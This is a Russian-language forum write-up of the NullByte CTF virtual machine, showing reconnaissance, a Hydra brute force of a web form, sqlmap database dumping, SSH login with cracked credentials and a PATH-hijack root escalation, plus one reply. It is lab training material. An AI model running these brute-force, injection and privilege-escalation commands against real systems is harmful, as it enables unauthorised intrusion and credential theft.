Взлом NullByte VM (CTF)

Vander

Well-Known Member
Администратор
16.01.2016
961
2 213
28
#1
Всем привет! В этой статье я опишу взлом уязвимой машины в рамках соревнований CTF.

Называется она NullByte VM (CTF Challenge) Для начала скачаем образ виртуальной машины отсюда =>
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
. Затем импортируем его, например, в VMware.

upload_2016-11-28_17-34-29.png

В качестве атакуемой машины, мной будет использоваться Kali Linux 2016.1 Rolling.

Начнем как обычно со сканирования своей сети, дабы обнаружить NullByte.

> arp-scan 192.168.0.1/16

upload_2016-11-28_17-35-2.png

В моем случае целевой хост имеет адрес 192.168.0.109.

Так же по традиции, запустим nmap в режиме агрессивного сканирования.

> nmap –A 192.168.0.109


upload_2016-11-28_17-35-35.png

Видим информацию о трех открытых портах, если с 777 и 80 все предельно ясно, а вот назначение 111 мне пока не ясно, возможно вернемся к нему позже.

Пока попробуем посмотреть, что же находится на 80 порту, зайдем на сервер по адресу 192.169.0.109:80.

upload_2016-11-28_17-36-10.png

Замечательная картинка и все… Пока ничего не ясно. Есть вариант посмотреть метаданные, так как они точно есть, это видно в исходном коде элемента. Перепробовав несколько онлайн сервисов, результата я не получил, виной тому формат .gif. Изрядно погуглив, я вышел на утилитку exiftool, которую можно установить в Kali Linux.

> apt-get install exiftool

upload_2016-11-28_17-36-28.png

Теперь можем просмотреть метаданные.

> exiftool main.gif


upload_2016-11-28_17-37-59.png

Строка Comment содержит явную подказку, сразу скажу – это директория, до этого я много пытался с ней сделать. Зайдем на сервер по адресу:

> 192.168.0.109/kzMb5nVYjw

upload_2016-11-28_17-38-27.png

Ключа у нас нет, но есть Hydra, ей и воспользуемся. Будем брутить эту форму входа. Для этого в терминале вводим следующую команду:

> hydra 192.168.56.109 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l x -P /usr/share/dict/words -t 10 -w 30

upload_2016-11-28_17-38-52.png

Дожидаемся окончания работы Гидры и получаем искомый пароль – elite. Используем его для входа на страницу.

upload_2016-11-28_17-39-11.png

Теперь у нас спрашивают имя пользователя, так как никакой информацией мы не располагаем, попробуем подключить к работе sqlmap.

> sqlmap –u
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
–dbs

upload_2016-11-28_17-59-40.png

Выполнение этого действия дало нам информацию о 5 найденных базах.

upload_2016-11-28_18-0-24.png

Нас же интересует – seth. Попробуем выжать больше информации следующей командой:

> sqlmap –u
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
–dump –columns –tables –D seth

upload_2016-11-28_18-0-49.png

Теперь у нас есть имя пользователя и хэш пароля.

upload_2016-11-28_18-1-13.png

Хэш отнесем на любой понравившийся вам онлайн расшифровщик. Но перед этим приведем его в вид base64.

> echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 –d

upload_2016-11-28_18-5-10.png

Теперь у нас на руках есть учетные данные одного пользователя.

upload_2016-11-28_18-5-30.png

Пароль – omega, логин – ramses. Попробуем эту связку при попытке доступа по SSH.

> ssh ramses@192.168.0.109 –p 777

В результате получаем открытую сессию SSH.

upload_2016-11-28_18-6-0.png

По итогам осмотра содержимого, интересным показался файл procwatch, находящийся в каталоге /var/www/backup. Запустив его, мы видим, что он вызывает список процессов.

upload_2016-11-28_18-6-19.png

Если нам удастся изменить путь файла для ps на sh, то мы сможем добраться до корневого каталога. Для выполнения этой задачи вводим следующие команды:

> cd /tmp

> cp /bin/sh /tmp/ps

> export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

> cd /var/www/backup

> ./procwatch

> whoami

upload_2016-11-28_18-6-56.png

Цель достигнута, мы root, далее выполняем:

> cd /root

> ls –a

> cat proof.txt

upload_2016-11-28_18-7-24.png

На этом прохождение Null Byte можно считать законченным. Спасибо за внимание.
 
24.12.2017
20
9
20
#2
можно было просто воспользоваться ImageMagic который предустановлен в кали и parrot, нежели скачивать exiftool. и кстати можно ли пробрутить
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
? если да то чем?
 

Ondrik8

prodigy
Red Team
08.11.2016
744
1 935
#3